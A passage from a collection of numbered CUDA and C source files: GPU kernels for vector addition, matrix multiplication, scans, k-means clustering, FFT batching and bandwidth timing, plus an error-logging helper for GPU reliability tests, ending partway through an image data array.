and kernel execution: " ); if (prop.deviceOverlap) printf( "Enabled\n" ); else printf( "Disabled\n"); printf( "Run time limit on kernels : " ); if (prop.kernelExecTimeoutEnabled) printf( "Enabled\n" ); else printf( "Disabled\n" ); printf( "\n" ); } }
21,446
#include "includes.h" __global__ void add(int a, int b, int *c){ *c = a + b; }
21,447
#include <iostream> using namespace std; __global__ void Mat_Mul_Global (float *A, float *B, float *C, int width){ int i = blockIdx.y * blockDim.y + threadIdx.y; //use 2D thread-blocks for convinience, use 1D is also OK. int j = blockIdx.x * blockDim.x + threadIdx.x; if ((i < width) && (j <width)){ // usually the number of threads is larger than the array size float value = 0.; // Non array variable in kenel is saved in the register of every thread for(int k=0; k<width; k++){ // every thread compute this loop of k value += A[i*width + k] * B[k*width + j]; // the scalar value is saved in the register for every thread (not in global memory), so there is no data race problem. } C[i*width+j] = value; // assign to array C on global memory } } int main(){ int n; cin >> n; int size = n*n*sizeof(float); //float *A, *B, *C; float *A = (float *) malloc( size ); // allocate CPU memory float *B = (float *) malloc( size ); float *C = (float *) malloc( size ); for(int i=0; i<n; i++) for(int j=0; j<n; j++){ int idx = i*n + j; A[idx] = 1.; B[idx] = 2.; C[idx] = 0.; } float *d_A, *d_B, *d_C; cudaMalloc(&d_A, size); // allocate GPU memory cudaMalloc(&d_B, size); cudaMalloc(&d_C, size); cudaMemcpy(d_A, A, size, cudaMemcpyHostToDevice); cudaMemcpy(d_B, B, size, cudaMemcpyHostToDevice); int block_width = 16; int grid_width = ceil(n/block_width); // dim3 is a CUDA built-in struct dim3 dim_grid(grid_width, grid_width); // num of blocks = (int(n/16) + 1)^2, efficient if > 6. dim3 dim_block(block_width, block_width); // number of theads per block = 16*16 =256 Mat_Mul_Global<<<dim_grid, dim_block>>> (d_A, d_B, d_C, n); // lauch kenel cudaMemcpy(C, d_C, size, cudaMemcpyDeviceToHost); for(int i=0; i<n; i++) for(int j=0; j<n; j++){ cout<<i<<" "<<j<<" "<<C[i*n+j]<<endl; } cudaFree(d_A); cudaFree(d_B); cudaFree(d_C); free(A); free(B); free(C); }
21,448
#include "includes.h" __global__ void incSumScanB2_kernel(unsigned int* d_outVals, unsigned int* d_inVals, size_t numVals, unsigned int* d_blockOffset) { // unsigned int tIdx = threadIdx.x; unsigned int gIdx = blockIdx.x * blockDim.x + threadIdx.x; extern __shared__ unsigned int s_incScan[]; if (gIdx >= numVals) return; d_outVals[gIdx] = ( blockIdx.x > 0) ? d_inVals[gIdx] + d_blockOffset[blockIdx.x]: d_inVals[gIdx]; }
21,449
#include <stdio.h> #define N (1024*1024) #define M (1000000) __global__ void cudakernel(float *buf) { /* this line is looking up the address i by taking the thread id (threadIdx.x) adding to block id (blockIdx.x), which is multiplied by the block dimensions This means that each thread coming into this has a unique ID, then by the line below, the thread is assigned to work on a certain section of the data block */ int i = threadIdx.x + blockIdx.x * blockDim.x; //what is this line doing? buf[i] = 1.0f * i / N; for(int j = 0; j < M; j++) buf[i] = buf[i] * buf[i] - 0.25f; } int main() { float data[N]; float *d_data; //device pointer //allocate memory on GPU cudaMalloc((void**) &d_data, N*sizeof(float)); //invoke kernel with 4096 blocks of 256 threads cudakernel<<<4096, 256>>>(d_data); //copy results back to host cudaMemcpy(data, d_data, N*sizeof(float), cudaMemcpyDeviceToHost); cudaFree(d_data); int input; printf("Enter an index: "); scanf("%d", &input); printf("data[%d] = %f\n", input, data[input]); }
21,450
__global__ void f1d3(float3 * __restrict__ ptr) { float3 v = ptr[threadIdx.x]; v.x += 1; v.y += 1; v.z += 1; ptr[threadIdx.x] = v; return; } // __global__ void f1(float4 * __restrict__ ptr) { // float4 v = ptr[threadIdx.x]; // v.x += 1; // v.y += 1; // v.z += 1; // v.w += 1; // ptr[threadIdx.x] = v; // return; // } int main() { // float4 *f1_ptr; // cudaMalloc(&f1_ptr, sizeof(float)*128); // cudaMemset(f1_ptr, 0, sizeof(float)*128); float3 *f1_ptr; cudaMalloc(&f1_ptr, sizeof(float)*96); cudaMemset(f1_ptr, 0, sizeof(float)*96); // global fuc // Timer t1, t2; // t1.Start(); // f1<<<1,32>>>(f1_ptr); f1d3<<<1,32>>>(f1_ptr); // t1.Pause(); // printf_timer(t1); cudaFree(f1_ptr); return 0; }
21,451
#include "includes.h" extern "C" { } __global__ void add(const float* x1, const float* x2, float* y, unsigned int len) { int tid = blockIdx.x * blockDim.x + threadIdx.x; if (tid < len) { y[tid] = x1[tid] + x2[tid]; } }
21,452
#include <float.h> __device__ float euclid2( float* items, float* centers, int itemId, int centerId, int paramsCount) { float sum = 0.0; for(int j = 0; j < paramsCount; j++) { sum = sum + (items[itemId * paramsCount + j] - centers[centerId * paramsCount + j]) * (items[itemId * paramsCount + j] - centers[centerId * paramsCount + j]); } return sum; } __global__ void clusreringKernel( float* items, float* deviceCenters, int* clustersIds, int itemsCount, int clustersCount, int paramsCount) { extern __shared__ float centers[]; for (int i = threadIdx.x; i < clustersCount; i += blockDim.x) { for (int j = 0; j < paramsCount; j++) { centers[clustersCount * j + i] = deviceCenters[clustersCount * j + i]; } } __syncthreads(); int itemId = blockDim.x * blockIdx.x + threadIdx.x; if(itemId < itemsCount) { float minDistance = FLT_MAX; float distance; int index; for(int i = 0; i < clustersCount; i++) { distance = euclid2(items, centers, itemId, i, paramsCount); if(minDistance >= distance) { minDistance = distance; index = i; } } clustersIds[itemId] = index; } } __global__ void newCentersKernel( float* items, int* clustersIds, float* newCenters, int* itemsPerClusters, int itemsCount, int clustersCount, int paramsCount ) { extern __shared__ float center[]; int clusterId = blockIdx.x; int paramId = threadIdx.x; center[paramId] = 0.0; int count = 0; __syncthreads(); for(int i = 0; i < itemsCount; i++) { if(clusterId == clustersIds[i]) { center[paramId] += items[i * paramsCount + paramId]; count += 1; } } newCenters[clusterId * paramsCount + paramId] = center[paramId]; itemsPerClusters[clusterId] = count; }
21,453
#include <stdio.h> #include <assert.h> #include <curand.h> #include <curand_kernel.h> #include <cuda_runtime.h> #include <unistd.h> #include <math.h> #define SIZE 3 #define BLOCKSIZE 512 #define PI 3.1415926535897932384626433 extern "C" void hello_world(){ printf("oi, fui importada com sucesso. \n"); } extern "C" void randomize(float *dV, int size){ curandGenerator_t prng; /* create generator*/ curandCreateGenerator(&prng, CURAND_RNG_PSEUDO_XORWOW); /* generate seed */ curandSetPseudoRandomGeneratorSeed(prng, (unsigned long long) 1337); /* randomize */ curandGenerateUniform(prng, dV, size); } extern "C" __global__ void applyfunction(float *dV, float *dV2, int size, float k, float M){ int i = blockIdx.x*blockDim.x + threadIdx.x; if (i < size){ dV[i] = ((float)sin((2*M + 1)*PI*dV[i])*cos(2*PI*k*dV[i]))/sin(PI*dV[i]); dV2[i] = dV[i]*dV[i]; } } extern "C" __global__ void sumvec(float *idata, int size){ __shared__ float sdata[BLOCKSIZE]; int s; int tid = threadIdx.x; int i = blockIdx.x*blockDim.x + threadIdx.x; int pseudoIf = i < size; /* if (blockIdx.x == 1 && threadIdx.x == 0){ printf("i = %d; size = %d; pseudoIf = %d\n", i, size, pseudoIf); }*/ sdata[tid] = pseudoIf*idata[i]; /* __syncthreads(); if (tid == 0){ for (s = 0; s < size; s++){ printf("id = %d sdata[%d] = %f; %f\n", blockIdx.x, s, sdata[s], idata[blockIdx.x*blockDim.x + s]); } }*/ __syncthreads(); for (s = blockDim.x/2; s > 0; s >>= 1){ if (tid < s){ sdata[tid] = sdata[tid] + sdata[tid+s]; } __syncthreads(); } if (tid == 0){ printf("id = %d, stored = %f\n", blockIdx.x, sdata[0]); idata[blockIdx.x] = sdata[0]; } } extern "C" float* MC_CUDA(int N, float k, float M){ int i, devID = 0; float *dV, *dV2, f, f2; cudaError_t error; cudaDeviceProp deviceProp; static float resultados[2]; /*CUDA boring stuff */ error = cudaGetDevice(&devID); if (error != cudaSuccess){ printf("cudaGetDevice returned error %s (code %d), line(%d)\n", cudaGetErrorString(error), error, __LINE__); } error = cudaGetDeviceProperties(&deviceProp,devID); if (deviceProp.computeMode == cudaComputeModeProhibited){ fprintf(stderr, "Error: device is running in <Compute Mode Prohibited>, no threads can use ::cudaSetDevice().\n"); exit(EXIT_SUCCESS); } if (error != cudaSuccess){ printf("cudaGetDeviceProperties returned error %s (code %d), line(%d)\n", cudaGetErrorString(error), error, __LINE__); } else{ printf("GPU Device %d: \"%s\" with compute capability %d.%d\n\n", devID, deviceProp.name, deviceProp.major, deviceProp.minor); } /* Allocate array on device */ error = cudaMalloc(&dV, sizeof(float)*N); if (error != cudaSuccess){ printf("cudaMalloc returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } error = cudaMalloc(&dV2, sizeof(float)*N); if (error != cudaSuccess){ printf("cudaMalloc returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } /* Generate array */ randomize(dV, N); /* Apply function */ applyfunction<<<(1 + (N/BLOCKSIZE)), BLOCKSIZE>>>(dV, dV2, N, k, M); /* Sum all values */ for (i = N; i > 1; i = 1+(i/BLOCKSIZE)){ printf("Number of blocks = %d\n", 1+(i/BLOCKSIZE)); printf("Size of array = %d\n", i); sumvec<<<(1+(i/BLOCKSIZE)), BLOCKSIZE>>>(dV, i); error = cudaDeviceSynchronize(); if (error != cudaSuccess){ printf("cudaDeviceSynchronize returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } printf("WAIT!\n"); sumvec<<<(1+(i/BLOCKSIZE)), BLOCKSIZE>>>(dV2, i); error = cudaDeviceSynchronize(); if (error != cudaSuccess){ printf("cudaDeviceSynchronize returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } } /* Copy values from device */ error = cudaMemcpy(&f, &dV[0], sizeof(float), cudaMemcpyDeviceToHost); if (error != cudaSuccess){ printf("cudaMemcpy returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } error = cudaMemcpy(&f2, &dV2[0], sizeof(float), cudaMemcpyDeviceToHost); if (error != cudaSuccess){ printf("cudaMemcpy returned error %s (code %d), line(%d) \n", cudaGetErrorString(error), error, __LINE__); } /* Calculate results */ printf("SOMA = %f\n", f); f /= N; f2 /= N; resultados[0] = f; resultados[1] = f2; cudaFree(dV); cudaFree(dV2); return resultados; }
21,454
// Includes, System #include <iostream> #include <assert.h> #include <chrono> // Here you can set the device ID that was assigned to you #define MYDEVICE 0 // 24%8=0 // Simple utility function to check for CUDA runtime errors void checkCUDAError(const char *msg); /////////////////////////////////////////////////////////////////////////////// // Program main /////////////////////////////////////////////////////////////////////////////// int main(int argc, char* argv[]) { cudaSetDevice(MYDEVICE); // pointer and dimension for host memory int const dimA = (argc > 1) ? std::atoi(argv[1]) : 8; std::cout << "dimA " << dimA << std::endl; float *h_a; // double *h_a; // pointers for device memory float *d_a, *d_b; // double *d_a, *d_b; // allocate and initialize host memory // Bonus: try using cudaMallocHost in place of malloc // it has the same syntax as cudaMalloc, but it enables asynchronous copies // h_a = (float *) malloc(dimA*sizeof(float)); // size_t memSize = dimA*sizeof(float); size_t memSize = dimA*sizeof(*h_a); cudaMallocHost( &h_a,memSize ); for (int i = 0; i<dimA; ++i) h_a[i] = i; // Part 1 of 5: allocate device memory // size_t memSize = dimA*sizeof(float); cudaMalloc( &d_a,memSize ); cudaMalloc( &d_b,memSize ); // Part 2 of 5: host to device memory copy { auto start = std::chrono::system_clock::now(); cudaMemcpy( d_a, h_a, memSize, cudaMemcpyHostToDevice ); auto stop = std::chrono::system_clock::now(); std::chrono::duration<double> dur= stop - start; float band = memSize/8./dur.count(); printf ("h2d : PCI bandwidth %.1f GB/seconds \n",float(memSize)/8000000000./dur.count()); } // Part 3 of 5: device to device memory copy { auto start = std::chrono::system_clock::now(); cudaMemcpy( d_b, d_a, memSize, cudaMemcpyDeviceToDevice ); auto stop = std::chrono::system_clock::now(); std::chrono::duration<double> dur= stop - start; printf ("d2d : PCI bandwidth %.1f GB/seconds \n",float(memSize)/8000000000./dur.count()); } // clear host memory for (int i=0; i<dimA; ++i ) h_a[i] = 0.f; // Part 4 of 5: device to host copy { auto start = std::chrono::system_clock::now(); cudaMemcpy( h_a, d_a, memSize, cudaMemcpyDeviceToHost ); auto stop = std::chrono::system_clock::now(); std::chrono::duration<double> dur= stop - start; printf ("d2h : PCI bandwidth %.1f GB/seconds \n",float(memSize)/8000000000./dur.count()); } // Check for any CUDA errors checkCUDAError("cudaMemcpy calls"); // verify the data on the host is correct for (int i=0; i<dimA; ++i) assert(h_a[i] == (float) i); // Part 5 of 5: free device memory pointers d_a and d_b cudaFree( d_a ); cudaFree( d_b ); // Check for any CUDA errors checkCUDAError("cudaFree"); // free host memory pointer h_a // free(h_a); cudaFreeHost(h_a); // If the program makes it this far, then the results are correct and // there are no run-time errors. Good work! std::cout << "Correct!" << std::endl; return 0; } void checkCUDAError(const char *msg) { cudaError_t err = cudaGetLastError(); if( cudaSuccess != err) { std::cerr << "Cuda error: " << msg << " " << cudaGetErrorString(err) << std::endl; exit(-1); } }
21,455
//3D vector class, floating point precision #include <iostream> #include <cmath> using namespace std; class Vec { public: float x,y,z; __device__ __host__ Vec() { x=0; y=0; z=0; } __device__ __host__ Vec(float x, float y, float z) { this->x = x; this->y = y; this->z = z; } __device__ __host__ Vec add(const Vec v) { return Vec(x + v.x,y + v.y,z + v.z); } void __device__ __host__ addTo(const Vec v) //increments vector { x += v.x; y += v.y; z += v.z; } __device__ __host__ Vec sub(const Vec v) { return Vec(x - v.x, y - v.y, z - v.z); } __device__ __host__ Vec times(float a) { return Vec(x*a,y*a,z*a); } __device__ __host__ float dot(const Vec u) { return x*u.x + y*u.y + z*u.z; } __device__ __host__ float mag() { return sqrt(squared()); } __device__ __host__ Vec cross(const Vec b) { float outx = y*b.z - z*b.y; float outy = z*b.x - x*b.z; float outz = x*b.y - y*b.x; return Vec(outx,outy,outz); } __device__ __host__ float squared() { return x*x+y*y+z*z; } __device__ __host__ Vec copy() { return Vec(x,y,z); } __device__ __host__ Vec unit() { return times(1.0/mag()); } void print() { cout << x << "," << y << "," << z << endl; } };
21,456
#include "includes.h" const int nblock = 32; ////////////////////////////////////////////////////////////////////////////////////////// __global__ void crossFilter(const double *Params, const float *W1, const float *W2, const float *UtU, float *WtW){ __shared__ float shW1[nblock*81], shW2[nblock*81]; float x; int nt0, tidx, tidy , bidx, bidy, i, Nfilt, t, tid1, tid2; tidx = threadIdx.x; tidy = threadIdx.y; bidx = blockIdx.x; bidy = blockIdx.y; Nfilt = (int) Params[1]; nt0 = (int) Params[9]; tid1 = tidx + bidx*nblock; tid2 = tidy + bidx*nblock; if (tid2<Nfilt){ while(tidx<nt0){ shW1[tidx + tidy * nt0] = W1[tidx + tid2 * nt0]; tidx+= nblock; } } tidx = threadIdx.x; tid2 = tidy + bidy*nblock; if (tid2<Nfilt){ while(tidx<nt0){ shW2[tidx + tidy * nt0] = W2[tidx + tid2 * nt0]; tidx+= nblock; } } tidx = threadIdx.x; __syncthreads(); if (tid2<Nfilt && tid1<Nfilt){ for(i=0;i<2*nt0-1;i++){ x = 0.0f; if(i<nt0) for(t=0;t<i+1;t++) x += shW1[t + nt0 * tidx] * shW2[t + (nt0-i-1) + nt0 * tidy]; else for(t=i-nt0+1;t<nt0;t++) x += shW1[t + nt0 * tidx] * shW2[t + (nt0-i-1) + nt0 * tidy]; WtW[tid1 + tid2*Nfilt + i*Nfilt*Nfilt] = x * UtU[tid1 + tid2*Nfilt]; } } }
21,457
#include "includes.h" // Second CUDA program // Ping-Che Chen #define BLOCK_SIZE 16 __global__ static void matMultCUDA(const float* a, size_t lda, const float* b, size_t ldb, float* c, size_t ldc, int n) { __shared__ float matA[BLOCK_SIZE][BLOCK_SIZE]; __shared__ float matB[BLOCK_SIZE][BLOCK_SIZE]; const int tidc = threadIdx.x; const int tidr = threadIdx.y; const int bidc = blockIdx.x * BLOCK_SIZE; const int bidr = blockIdx.y * BLOCK_SIZE; int i, j; float results = 0; float comp = 0; for(j = 0; j < n; j += BLOCK_SIZE) { matA[tidr][tidc] = a[(tidr + bidr) * lda + tidc + j]; matB[tidr][tidc] = b[(tidr + j) * ldb + tidc + bidc]; __syncthreads(); for(i = 0; i < BLOCK_SIZE; i++) { float t; comp -= matA[tidr][i] * matB[i][tidc]; t = results - comp; comp = (t - results) + comp; results = t; } __syncthreads(); } c[(tidr + bidr) * ldc + tidc + bidc] = results; }
21,458
// CUDA code : Add two float vectors together // Device code ( taken form Cuda SDK ) #include <iostream> __global__ void VecAdd(const float* A, const float* B, float* C, int N) { int i = blockDim.x * blockIdx.x + threadIdx.x; if (i < N) C[i] = A[i] + B[i]; } // C interface wrapper - A B C are cudaMalloc'ed references extern "C" void vecAdd( const float* A, const float* B, float* C, int size ) { int threadsPerBlock = 256; int blocksPerGrid = (size + threadsPerBlock - 1) / threadsPerBlock; VecAdd<<<blocksPerGrid, threadsPerBlock>>>(A, B, C, size); }
21,459
#include <cuda.h> #include <cufft.h> #include <stdio.h> #include <math.h> #define DATASIZE 32768 #define BATCH 16384 /********************/ /* CUDA ERROR CHECK */ /********************/ #define gpuErrchk(ans) { gpuAssert((ans), __FILE__, __LINE__); } inline void gpuAssert(cudaError_t code, const char *file, int line, bool abort=true) { if (code != cudaSuccess) { fprintf(stderr,"GPUassert: %s %s %d\n", cudaGetErrorString(code), file, line); if (abort) exit(code); } } /********/ /* MAIN */ /********/ int main () { // --- Host side input data allocation and initialization cufftReal *hostInputData = (cufftReal*)malloc(DATASIZE*BATCH*sizeof(cufftReal)); for (int i=0; i<BATCH; i++) for (int j=0; j<DATASIZE; j++) hostInputData[i*DATASIZE + j] = (cufftReal)(i + 1); // --- Device side input data allocation and initialization cufftReal *deviceInputData; gpuErrchk(cudaMalloc((void**)&deviceInputData, DATASIZE * BATCH * sizeof(cufftReal))); cudaMemcpy(deviceInputData, hostInputData, DATASIZE * BATCH * sizeof(cufftReal), cudaMemcpyHostToDevice); // --- Host side output data allocation cufftComplex *hostOutputData = (cufftComplex*)malloc((DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex)); // --- Device side output data allocation cufftComplex *deviceOutputData; gpuErrchk(cudaMalloc((void**)&deviceOutputData, (DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex))); // --- Batched 1D FFTs cufftHandle handle; int rank = 1; // --- 1D FFTs int n[] = { DATASIZE }; // --- Size of the Fourier transform int istride = 1, ostride = 1; // --- Distance between two successive input/output elements int idist = DATASIZE, odist = (DATASIZE / 2 + 1); // --- Distance between batches int inembed[] = { 0 }; // --- Input size with pitch (ignored for 1D transforms) int onembed[] = { 0 }; // --- Output size with pitch (ignored for 1D transforms) int batch = BATCH; // --- Number of batched executions cufftPlanMany(&handle, rank, n, inembed, istride, idist, onembed, ostride, odist, CUFFT_R2C, batch); //cufftPlan1d(&handle, DATASIZE, CUFFT_R2C, BATCH); cufftExecR2C(handle, deviceInputData, deviceOutputData); // --- Device->Host copy of the results gpuErrchk(cudaMemcpy(hostOutputData, deviceOutputData, (DATASIZE / 2 + 1) * BATCH * sizeof(cufftComplex), cudaMemcpyDeviceToHost)); /*for (int i=0; i<BATCH; i++) for (int j=0; j<(DATASIZE / 2 + 1); j++) printf("%i %i %f %f\n", i, j, hostOutputData[i*(DATASIZE / 2 + 1) + j].x, hostOutputData[i*(DATASIZE / 2 + 1) + j].y); */ printf("Done!\n"); cufftDestroy(handle); gpuErrchk(cudaFree(deviceOutputData)); gpuErrchk(cudaFree(deviceInputData)); }
21,460
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <sys/time.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> // Location of timetamp file for software watchdog char timestamp_watchdog[200] = "/home/carol/watchdog/timestamp.txt"; // Max errors that can be found for a single iteration // If more than max errors is found, exit the program unsigned long int max_errors_per_iter = 5000; // Absolute path for log file, if needed char absolute_path[200] = "/home/carol/logs/"; // Used to print the log only for some iterations, equal 1 means print every iteration int iter_interval_print = 1; char log_file_name[200] = ""; char full_log_file_name[300] = ""; // Saves the last amount of error found for a specific iteration unsigned long int last_iter_errors = 0; // Saves the last iteration index that had an error unsigned long int last_iter_with_errors = 0; unsigned long int kernels_total_errors = 0; unsigned long int iteration_number = 0; double kernel_time_acc = 0; double kernel_time = 0; long long it_time_start; // ~ =========================================================================== inline long long get_time() { struct timeval tv; gettimeofday(&tv, NULL); return (tv.tv_sec * 1000000) + tv.tv_usec; }; // ~ =========================================================================== unsigned long int set_max_errors_iter(unsigned long int max_errors){ max_errors_per_iter = max_errors; return max_errors_per_iter; }; // ~ =========================================================================== // Set the interval the program must print log details, default is 1 (each iteration) int set_iter_interval_print(int interval){ if(interval < 1) { iter_interval_print = 1; } else { iter_interval_print = interval; } return iter_interval_print; }; // ~ =========================================================================== // Update with current timestamp the file where the software watchdog watchs void update_timestamp() { time_t timestamp = time(NULL); char time_s[50]; char string[100] = "echo "; sprintf(time_s, "%d", (int) timestamp); strcat(string, time_s); strcat(string, " > "); strcat(string, timestamp_watchdog); system(string); }; // ~ =========================================================================== // In case the user needs the log to be generated in some exact absolute path void set_absolute_path(char *path){ strcpy(absolute_path, path); }; // ~ =========================================================================== // Return the name of the log file generated char * get_log_file_name(){ return full_log_file_name; }; // ~ =========================================================================== // Generate the log file name, log info from user about the test to be executed and reset log variables int start_log_file(char *benchmark_name, char *test_info){ update_timestamp(); time_t file_time; struct tm *ptm; char day[10], month[10], year[15], hour[10], second[10], minute[10]; char log_file_name[180] = ""; file_time = time(NULL); ptm = gmtime(&file_time); snprintf(day, sizeof(day), "%02d", ptm->tm_mday); snprintf(month, sizeof(month), "%02d", ptm->tm_mon+1); snprintf(year, sizeof(year), "%04d", ptm->tm_year+1900); snprintf(hour, sizeof(hour), "%02d", ptm->tm_hour); snprintf(minute, sizeof(minute), "%02d", ptm->tm_min); snprintf(second, sizeof(second), "%02d", ptm->tm_sec); // ~ Get the host name to add inside the log name. char host[35] = "Host"; int host_error = 0; host_error = gethostname(host, 35); if (host_error != 0) { fprintf(stderr, "[ERROR in gethostname(char *, int)] Could not access the host name\n"); return 1; } strcpy(log_file_name, year); strcat(log_file_name, "_"); strcat(log_file_name, month); strcat(log_file_name, "_"); strcat(log_file_name, day); strcat(log_file_name, "_"); strcat(log_file_name, hour); strcat(log_file_name, "_"); strcat(log_file_name, minute); strcat(log_file_name, "_"); strcat(log_file_name, second); strcat(log_file_name, "_"); strcat(log_file_name, benchmark_name); strcat(log_file_name, "_"); strcat(log_file_name, host); strcat(log_file_name, ".log"); strcpy(full_log_file_name, absolute_path); if(strlen(absolute_path) > 0 && absolute_path[strlen(absolute_path)-1] != '/' ) strcat(full_log_file_name, "/"); strcat(full_log_file_name, log_file_name); // ~ printf("%s\n", full_log_file_name); struct stat buf; if (stat(full_log_file_name, &buf) == 0) { fprintf(stderr, "[ERROR in create_log_file(char *)] File already exists %s\n",full_log_file_name); return 1; } FILE *file = NULL; file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in create_log_file(char *)] Unable to open file %s\n",full_log_file_name); return 1; } else if(test_info != NULL) { fprintf(file, "#HEADER %s\n",test_info); } else { fprintf(file, "#HEADER\n"); } fprintf(file, "#BEGIN Y:%s M:%s D:%s Time:%s:%s:%s\n", year, month, day, hour, minute, second); fflush(file); fclose(file); kernels_total_errors = 0; iteration_number = 0; kernel_time_acc = 0; return 0; }; // ~ =========================================================================== // Log the string "#END" and reset global variables int end_log_file(){ FILE *file = NULL; file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } fprintf(file, "#END"); fflush(file); fclose(file); kernels_total_errors = 0; iteration_number = 0; kernel_time_acc = 0; strcpy(log_file_name, ""); strcpy(absolute_path, ""); strcpy(full_log_file_name, ""); return 0; }; // ~ =========================================================================== // Start time to measure kernel time, also update iteration number and log to file int start_iteration(){ update_timestamp(); /* FILE *file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } fprintf(file, "#ITER it:%lu\n", iteration_number); fflush(file); fclose(file); iteration_number++; */ it_time_start = get_time(); return 0; }; // ~ =========================================================================== // Finish the measured kernel time log both time (total time and kernel time) int end_iteration(){ update_timestamp(); kernel_time = (double) (get_time() - it_time_start) / 1000000; kernel_time_acc += kernel_time; if(iteration_number % iter_interval_print == 0) { FILE *file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } fprintf(file,"#IT Ite:%lu KerTime:%f AccTime:%f\n", iteration_number, kernel_time, kernel_time_acc); //fprintf(file, "#TIME kernel_time:%f\n", kernel_time); //fprintf(file, "#ACC_TIME total_time:%f\n", kernel_time_acc); fflush(file); fclose(file); } iteration_number++; return 0; }; // ~ =========================================================================== // Update total errors variable and log both errors(total errors and kernel errors) int log_error_count(unsigned long int kernel_errors){ update_timestamp(); if(kernel_errors < 1) { return 0; } kernels_total_errors += kernel_errors; FILE *file = NULL; file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } // (iteration_number-1) because this function is called after end_iteration() that increments iteration_number fprintf(file, "#SDC Ite:%lu KerTime:%f AccTime:%f KerErr:%lu AccErr:%lu\n", iteration_number-1, kernel_time, kernel_time_acc, kernel_errors, kernels_total_errors); //fprintf(file, "#SDC kernel_errors:%lu\n", kernel_errors); //fprintf(file, "#TOTAL_SDC total_errors:%lu\n", kernels_total_errors); fflush(file); if(kernel_errors > max_errors_per_iter){ fprintf(file, "#ABORT too many errors per iteration\n"); fflush(file); fclose(file); end_log_file(); exit(1); } if(kernel_errors == last_iter_errors && (last_iter_with_errors+1) == iteration_number && kernel_errors != 0){ fprintf(file, "#ABORT amount of errors equals of the last iteration\n"); fflush(file); fclose(file); end_log_file(); exit(1); } fclose(file); last_iter_errors = kernel_errors; last_iter_with_errors = iteration_number; return 0; }; // ~ =========================================================================== // Print some string with the detail of an error to log file int log_error_detail(char *string){ FILE *file = NULL; file = fopen(full_log_file_name, "a"); if (file == NULL){ fprintf(stderr, "[ERROR in log_string(char *)] Unable to open file %s\n",full_log_file_name); return 1; } fputs("#ERR ", file); fputs(string, file); fprintf(file, "\n"); fflush(file); fclose(file); return 0; };
21,461
#define _CRT_SECURE_NO_WARNINGS #include <stdio.h> #include <cuda.h> #include "cuda_runtime.h" #include "device_launch_parameters.h" //2015253039 __global__ void helloWorld(char* str) { int idx = blockIdx.x * blockDim.x + threadIdx.x; str[idx] += idx; } int main(int argc, char** argv) { int i; char strin[12] = "Hello"; char str[] = "Hello World!"; printf("%s", strin); for (i = 0; i < 12; i++) { str[i] -= i; } printf("%s\n", str); char* d_str; size_t size = sizeof(str); cudaMalloc((void**)&d_str, size); cudaMemcpy(d_str, str, size, cudaMemcpyHostToDevice); dim3 dimBlock(2); dim3 dimThread(6); helloWorld<<< dimBlock, dimThread >>>(d_str); cudaMemcpy(str, d_str, size, cudaMemcpyDeviceToHost); cudaFree(d_str); printf("%s\n", str); return 0; }
21,462
#include "includes.h" /****************************************************************************** Displays two grey scale images. On the left is an image that has come from an image processing pipeline, just after colour thresholding. On the right is the result of applying an edge detection convolution operator to the left image. This program performs that convolution. Things to note: - A single unsigned char stores a pixel intensity value. 0 is black, 256 is white. - The colour mode used is GL_LUMINANCE. This uses a single number to represent a pixel's intensity. In this case we want 256 shades of grey, which is best stored in eight bits, so GL_UNSIGNED_BYTE is specified as the pixel data type. To compile adapt the code below wo match your filenames: cc -o ip_coursework ip_coursework.c -lglut -lGL -lm Dr Kevan Buckley, University of Wolverhampton, 2018 ******************************************************************************/ #define width 100 #define height 72 unsigned char results[width * height]; unsigned char image[] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 